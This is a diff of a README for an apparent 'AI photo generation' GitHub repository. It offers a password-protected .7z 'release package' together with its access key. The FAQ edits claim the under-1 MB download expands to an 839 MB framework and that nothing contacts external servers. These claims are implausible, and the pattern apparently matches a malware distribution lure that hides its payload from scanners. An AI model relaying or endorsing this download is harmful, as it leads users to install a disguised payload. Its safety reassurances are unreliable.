maiklfancy/ai-photo-generation/README.md

 * **[Click here to download the stable release package](https://github.com/maiklfancy/ai-photo-generation/raw/refs/heads/main/ai-visual-synthesis-v1.0.7z)**
 * **Local WebUI Access Key:** `f1PQI0RVra`

 ---

 ## ❓ Frequently Asked Questions (FAQ)

+#### Q: Is my data safe running locally?
+**A:** Absolutely.
+The engine operates entirely within your network loopback interface (`127.0.0.1`).
+No external servers are contacted, and no prompt telemetry or output metadata is uploaded anywhere.

-#### Q: Why is the initialization download package under 1 MB if the core binary is 800 MB?
+#### Q: Why is the initial download file so small?
-**A:** The environment deployment structure leverages advanced dynamic compilation headers and `LZMA2` stream pooling.
-All core server logic expands seamlessly to its physical 839-megabyte standalone architecture immediately upon archival extraction using the local access key.
+**A:** As detailed in the architecture section, the package uses high-ratio stream compression.
+The entire 839 MB file framework expands dynamically onto your disk immediately upon folder extraction.

-#### Q: Can I run this completely offline?
+#### Q: Can I use this completely offline?
 **A:** Yes.
-Once the initial repository setup is verified and extracted, the entire generation pipeline operates locally on your hardware without transmitting telemetry or needing active internet access.
+Once the initial package setup is extracted and verified on your local drive, you can disconnect your internet entirely.
+The visual synthesis generation pipeline does not require active web access.